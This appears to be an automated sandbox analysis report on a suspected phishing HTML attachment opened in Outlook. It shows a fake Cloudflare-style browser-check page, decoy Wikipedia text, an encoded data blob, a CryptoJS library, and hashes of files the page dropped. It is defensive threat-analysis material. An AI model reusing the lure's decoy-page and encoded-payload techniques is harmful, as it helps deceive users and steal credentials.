                                        "contains_trigger_text":true,
                                        "trigger_text":"Running checks to verify your browser's security features.",
                                        "prominent_button_name":"unknown",
                                        "text_input_field_labels":"unknown",
                                        "pdf_icon_visible":false,
                                        "has_visible_captcha":false,
                                        "has_urgent_text":false,
                                        "text":"Verifying... Running checks to verify your browser's security features.",
                                        "has_visible_qrcode":false}
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        "{
                                           \"brand\": [],
                                           \"contains_trigger_text\": false,
                                           \"trigger_text\": \"\",
                                           \"prominent_button_name\": \"unknown\",
                                           \"text_input_field_labels\": \"unknown\",
                                           \"pdf_icon_visible\": false,
                                           \"has_visible_captcha\": false,
                                           \"has_urgent_text\": false,
                                           \"text\": \"Spanish scholasticism insisted on a subjective vision of law during the 16th and 17th centuries: Luis de Molina,
                                         Domingo de Soto and Francisco Vitoria,
                                         members of the School of Salamanca,
                                         defined law as a moral power over one's own.50 Although they maintained at the same time,
                                         the idea of law as an objective order,
                                         they stated that there are certain natural rights,
                                         mentioning both rights related to the body (right to life,
                                         to property) and to the spirit (right to freedom of thought,
                                         dignity). The jurist Vzquez de Menchaca,
                                         starting from an individualist philosophy,
                                         was decisive in the dissemination of the term iura naturalia. This natural law thinking was supported by contact with American civilizations and the debate that took place in Castile about the just titles of the conquest and,
                                         in particular,
                                         the nature of the indigenous people. In the Castilian colonization of America,
                                         it is often stated,
                                         measures were applied in which the germs of the idea of Human Rights are present,
                                         debated in the well-known Valladolid Debate that took place in 1550 and 1551. The thought of the School of Salamanca,
                                         especially through Francisco Vitoria,
                                         also contributed to the promotion of European natural law. From this foundation,
                                         the modern human rights arguments emerged over the latter half of the 20th century.12] Magna Carta is an English charter originally issued in 1215 which influenced the development of the common law and many later constitutional documents related to human rights,
                                         such as the 1689 English Bill of Rights,
                                         the 1789 United States Constitution,
                                         and the 1791 United States Bill of Rights.21] 17th century English philosopher John Locke discussed natural rights in his work,
                                         identifying them as being \"life,
                                         liberty,
                                         and estate (property)\",
                                         and argued that such fundamental rights could not be surrendered in the social contract. In Britain in 1689,
                                         the English Bill of Rights and the Scottish Claim of Right each made a range of oppressive governmental actions,
                                         illegal.22] Two major revolutions occurred during the 18th century,
                                         in the Unite}
                                        "
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        {
                                        "brand":["Cloudflare"],
                                        "contains_trigger_text":false,
                                        "trigger_text":"",
                                        "prominent_button_name":"Success!",
                                        "text_input_field_labels":"unknown",
                                        "pdf_icon_visible":false,
                                        "has_visible_captcha":false,
                                        "has_urgent_text":false,
                                        "text":"Running checks to verify your browser's security features.",
                                        "has_visible_qrcode":false}
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):231348
                                        Entropy (8bit):4.377241006469137
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:10A3D38FF951237E2B235F026A415D93
                                        SHA1:600DF9B960A6FB17DEF2DF5779C1B839185A2345
                                        SHA-256:13BC61C35499EE19BC9D28D908E4E2968FF90958FCEB74D9FA7F363808ADE00A
                                        SHA-512:6508B60E5CE618481A84541FEFED81AB881A06813C43414CBBD7E779859D6D19FF227EBB7DDF46D96AB2E5EF78DAFE68A10D5E17789E5BFBDC0CE23C910811BE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:TH02...... .Pm..w.......SM01X...,...p...w...........IPM.Activity...........h...............h............H..ht.......?9O....h..........!.H..h\cal ...pDat...h(z&.0.........hO>@...'........h........_`Pk...h.=@.@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. hd&.........#h....8.........$h..!.....8....."hp.O.......O...'h..............1hO>@.<.........0h....4....Uk../h....h.....UkH..h..'.p...t.....-h .............+h.?@....h........... ...... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                        SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                        SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                        SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:[ZoneTransfer]..ZoneId=3..
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):628664
                                        Entropy (8bit):6.0038134250315265
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:17E38E61E0933ECA2C713792A505BF2A
                                        SHA1:947F0A46A25C4CB3594977D0B11509C595EDC8C6
                                        SHA-256:2A8CE37F8752327E60A6450C4CEF5DDDDBECBDC09D6611E611D0629336E5C171
                                        SHA-512:00DB7918A01E06CF6353CF876AB318AB93DE9E7241AB4C9C997B43067E7AC222CB400CC147018ECFB5D00D95984C6F5DADD2EFCD2A8649E9728A69F53C5D2BFC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Gms-worldwide - Tuesday, October 08, 2024</title><style>*{box-sizing:border-box;margin:0;padding:0}body,html{height:100%;margin:0;display:flex;justify-content:center;align-items:center;background:#fff;font-family:Arial,sans-serif;width:100%;overflow:hidden;background-image:url(data:image/jpeg;base64,iVBORw0KGgoAAAANSUhEUgAABkAAAANdCAYAAADMfLBFAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAP+lSURBVHhe7P1Zs23Lth4GtdGLUc1qrb3XLs4+59xzr2UkB5XByCJsExgBNryDZQjZvPNAYcDweoNCCGPB3+AFAoRNYSvADvQAEYTD6Mr36kqWdM7ZZxernuWoejH4vq9l9t7HmGPOVe21y/zGaL1n2TKz9exZ9swc/T/+t/+TrSUkJCQkvDNa0Igl6ijQfYDjLdzQWW5bK1cby66XVl1e2tUXX9n65QvbrlY2alu4AdNta9vtFir3xGBiUDvMFAHFhBZyk3Uu3SxC3Nps3zghISEhISHhjeC1bcSWNe8IdTFoa7W1+cZGZWNZYTae5XZ8OrHJNIca9f+0tm0GQt29ZR0+Yq3NH72zBZCDdeCN+rqvssEf9m9Uhx9uDnwPwIiRcB0hcmjvtGj/sM2TMe3bwup6YpdXuT35+sbOL1b2/CVpY80WrahRbg3lxrYQ/Iyghk
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):497592
                                        Entropy (8bit):6.003208292714391
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8792E366E4D22174FF5ACA63ECF87B57
                                        SHA1:316ADFEFF80B610346DE7D7DDAB17A2B3EBD24F4
                                        SHA-256:3DFD44D20CB75DB728C32E0C5A537AE3B1F8AED5DC856BE767CEFE35573A6BEA
                                        SHA-512:F7E1037C4EF14A40D4E73E538185E33954F1E92A0513D79DDD332EE949077BFA609730D279071D486E2327FA9A7273791CC1D222AF0857B854C51D1408ED30ED
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:IN5BUSd4Hs2PeA9KJtGfYRoB9/WmYpfyikEIgpmMHb+kNUQ8+NCS4B8D6iQL+RfgOWT6BEQCqiZQF59Th9+g1GbLuv274V7t4nG3ft1gkQttnPvP2W+vHy2XPI8w2dNLCAWgY5C/UFM3pUbgppAUnA/GpqbHPrADLa5Dz2Ti+Rhpvo1VhyZlVDFF6gL68JgN36wGLdAZJM64Im7k7gIiPIIukxbZsJ/vnw1aOK1XxIjitjUK3y386WG/YYV/dywm7y9mo9irjp6elB/6Emp154Wd5+/kWZH+OdLTy+LyVrdmyXR7/9W+WBT32jZIf7bXcS1OBDcPGlHn1llnlrqdrt06iquhaBpbu41B1cLQwwjGEv417jw7GmNhUjbD0XI/8VyiykpdSipK5S3b6PFOVuoNujatEn1Gcqppf+oHdI1nbgRBKAArGB/K/9SmRS9eOSRCY+TO/QTSemT45PoI9fGBjQiTkSJwhnxsdlenxMSnOz1KjpNYz7ayWYRn2meYIpBZ9sGvGoKaKGgpsTEzO68wP9E/ZR0Dee5MJLuIl3evBILLZ8eTE6Jzf0KHzwJR8/AWIg74gYVnr7aJ67R+ZadjfIZKMqE9xlUq/obpMZ2M3JEbqFEybkwcpNJ+LbbIBYbrAQYR6Ifkfpqgn+Dq02sqQZwMagWXYZKKdtVJTn7EdzATPzkO4AYfxrA5na2KajXgeV5TtMKYZQxSQgQ5hkhBbKXD9181QHdMA/3d98SPSbBRTvubOy3i8g6CYzYRQV03iSYxBx0DCHbt3Wq4ABVUMFA0XdXaE8/JsP3x7RhwOPXl+cXhREXWDB4RuYjFvmf25b41sBJf5x0FYbDqjcC0NDkuUOBZ6LqyWT6QvAhq1K4p/m4K4o2OqKJrrQ7xGoP7pB/9m/h66cc8SCN03UmpIoVaU1UxKZr0qy0pB0HQ2iYkXqE9NSvzIpCXToUxzABRcO0gbhAXsI/mLdtWzQPICMEgsGj49/HwkMC2
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                        File Type:data
                                        Category:modified
                                        Size (bytes):30
                                        Entropy (8bit):1.2389205950315936
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5AAB7480330B1689500DB7B3AD586779
                                        SHA1:5BC057101B98A6690B7EA1EB4290BC37F54922A3
                                        SHA-256:14371CF741F1426E5A6873C11E7A7854BE8740B5BBA5E7AFB306CCDADF3F429B
                                        SHA-512:25D25D6A6DCF2A19B127C5411FE5BE10BD6CE2A6ED93BC0897771F599769A7294F2FBE0EDD79D0E1620E5098A8585D01E9AEA2F0E5BDE0AE3876A96DAE4C0FB3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:....R.........................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 10:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2673
                                        Entropy (8bit):3.9847670779147935
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E1825562DD60BB1BD4784EDADBFA91BE
                                        SHA1:7743A144CE2756AC7328C92F2C874A2F83D3A4A9
                                        SHA-256:5B20ECBADA8C9EA66DFF317E45D40970ECE4E019017E3F9BCEA3289E7F54AE12
                                        SHA-512:A38D5BBDEAB6E96ABEF16FF69F1A79C4F9DCE0B6524028DA02BC494E1A788C6AD2B043AE71C6C27EBB260FBAC7B712634C72DE94C1EB327C89A4F63DB06798D9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.......x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 10:48:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2675
                                        Entropy (8bit):3.999615827213161
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8A215E83DAD8EC1B197ECA689C0FF14A
                                        SHA1:6CF52ABED531C13F76AE38965A4CCF33D6A2D716
                                        SHA-256:43506B6C6F28E93A0A042B6D0BC0E99C5B7283CD46C4140F05E9E76333627004
                                        SHA-512:2980F146418D023B43264B1FF34B25A5ABE6E559686289238C8BE1E34F64DB923F37BB77F44D1677952780DDE770B2F17C1A2F35960B75FDFCF206974C643655
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,......j.x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2689
                                        Entropy (8bit):4.007291997564906
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4E0610A31D0BF514AD18B89057DE5281
                                        SHA1:A447771DDC709B01710AD69E969DDC63B7E14D5C
                                        SHA-256:8A71A365319EFBB62282F3F02CC8EFF06CF65357165EE51B4A1DCD66B5D09845
                                        SHA-512:4BB42D6AC00C31E29494D0C3DAC25282FCAAF36037D5D1254EA451121BB21AE64536EA55D294FD93CBE8A1D4301B00BCBE8555C3481266B3CB61AE3C6CE575A9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 10:48:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.996926561792068
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CF9E184D9359AA19AC03A7CF4486E4A7
                                        SHA1:30B2DC3F35A26BC98A1325E2A899D9820F75AF25
                                        SHA-256:70DF8C7E04D21B7317558CA9D4EB9BCC248CCDA60FAD14616C4C8B34674BF635
                                        SHA-512:92AD733154918C8CE1CE47920B1BA148E4A3A4CD971260CD628CE715E414AB8FFEA0F4446E9C6A7607DBF73CBA66DE60C18CBC55B7D90E4FEB304730348E6A9B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....a.x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 10:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.986176009353756
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:04E9DA975E07DBC94F8644856D7D8CB4
                                        SHA1:63BFEB2BED20DC902F841D7EA7931962432BC3C8
                                        SHA-256:E1B1C1704B4AFCD88798B52A2F07A74870CF4B5D3594FE39A1FD310DD649649A
                                        SHA-512:D0695D5FA7748616EF57B0152637819688D0E48D27871333B97CCEEF2110836B0436DA7DDE6B480528637C62745D0B7A328ABCBEA0A615A57E85AE1AF9430B8C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....v.y.x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 8 10:48:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):3.9924544156235746
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FB822CCFE9BE2F1C5EBD45B693DF712E
                                        SHA1:D40F98AEF987A4F88A07D1E1DE7E5E5645B84FC2
                                        SHA-256:3AF67C7CD12294C1211726F8BC72F811289D09939F3A8721E09DDF004A35C6F1
                                        SHA-512:5EF37685104B30DE9032F6BC9159F96C80687C265AE42D7595749E925C5987C1A7E020C3B76FACA5F0B773ABEEE825102FAA0489DE14D630FE3FDBD701D6C066
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....HdT.x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IHY.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............4.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                        Category:dropped
                                        Size (bytes):48316
                                        Entropy (8bit):5.6346993394709
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2CA03AD87885AB983541092B87ADB299
                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1002)
                                        Category:downloaded
                                        Size (bytes):62961
                                        Entropy (8bit):5.345846775281012
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:B8A5274FF5AC7BCF0D358CA8300B3544
                                        SHA1:38194DFB6026A7370E4349FF6B6ECA477AF8D6DC
                                        SHA-256:BF58A7FCD74DE98BEEC9E03DCA15BDD8BB1FBA6C114673B2AE8C076775264C5A
                                        SHA-512:95BE770D51866388F2613CF80D7E30789FFF923F8439621841BACCF4D44F0C478BC71CC9BA12BAAF04D2AFAA0E8B1DB87C207575968AF0461418ADD2EC5F3AA1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022
                                        Preview:function isCompatible(){return!!('querySelector'in document&&'localStorage'in window&&typeof Promise==='function'&&Promise.prototype['finally']&&(function(){try{new Function('(a = 0) => a');return true;}catch(e){return false;}}())&&/./g.flags==='g');}if(!isCompatible()){document.documentElement.className=document.documentElement.className.replace(/(^|\s)client-js(\s|$)/,'$1client-nojs$2');while(window.NORLQ&&NORLQ[0]){NORLQ.shift()();}NORLQ={push:function(fn){fn();}};RLQ={push:function(){}};}else{if(window.performance&&performance.mark){performance.mark('mwStartup');}(function(){'use strict';var con=window.console;function Map(){this.values=Object.create(null);}Map.prototype={constructor:Map,get:function(selection,fallback){if(arguments.length<2){fallback=null;}if(typeof selection==='string'){return selection in this.values?this.values[selection]:fallback;}var results;if(Array.isArray(selection)){results={};for(var i=0;i<selection.length;i++){if(typeof selection[i]==='string'){results[
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):13444
                                        Entropy (8bit):7.976143367474683
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C2BC34648C583E6B9959C60BF51A4EFF
                                        SHA1:7FE85A21E9246C62CDB3845DBF06642EA5540E59
                                        SHA-256:94F7729893505B73B9360F51C67074CF44D31A096F25088699CA290FA39CCED0
                                        SHA-512:1E587252C34AE2BB377631D23436F018649063A03557E7A09D3AC1FF200084AC1D46B8F6E994C065CAD4ABD5B3DD9D0BC3D733DDC43ECBF93F856202A2CCB6B1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...d...d.....p.T....gAMA......a...4;IDATx...T[]..._.......SwW...{.;E#D J....C.......}n.M...q.Z.&......s/..1~.....1~....m....x...r..>....._.../.......gg./..W...*.U../...b......N[[.9..C.m.g|~..j+'U........q.<)3..999...xyNnA 7...z..kKp..A.Z.........Woo..uu....Q_..jhl...BRku.....BQ..}...hi1[l/Z..d......]Je....('7.2.s.(.....I..rr....X2f?....%......3g..>...F3e......I@.+.n..WW..mmm.57.<........2.L....0......mvGZY.#.py.......*w.....R..V[.g.J3..@.DFf..).htQQ.jM .P..TA.O.4.<.......l0x.......t!DSs....Q...b.F...i,q.\..B...NL....l6....F.....\.v{...g0q......k.[YC..Jr..E.@v..l...RRjz.X.{.B.t%....R.."e1....@.R....H..C}y` 0...?......')...&k(.6.:.K.9.H.*~.n...Hc.Z].US{..,J[[.y<.*..l...X.J.........B.4TW.H..l.N|.E.85... .r.K..n..E.f...q.l.r.sF..E../2.......<.....f.Z........C==~.Y.. ......4>..@.k....a0.............-....jk..6...".(.UpIe%.#...-^r.!v...2[T..q+i.]4u.......w4.O.h...0..5...,...@_....B....Gi..md/.S8...o.....d&..V........;;..p(.........
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 135 x 155, 8-bit colormap, non-interlaced
                                        Category:downloaded
                                        Size (bytes):7951
                                        Entropy (8bit):7.933776057154196
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:814092D761989C74620EB311F2C71B9D
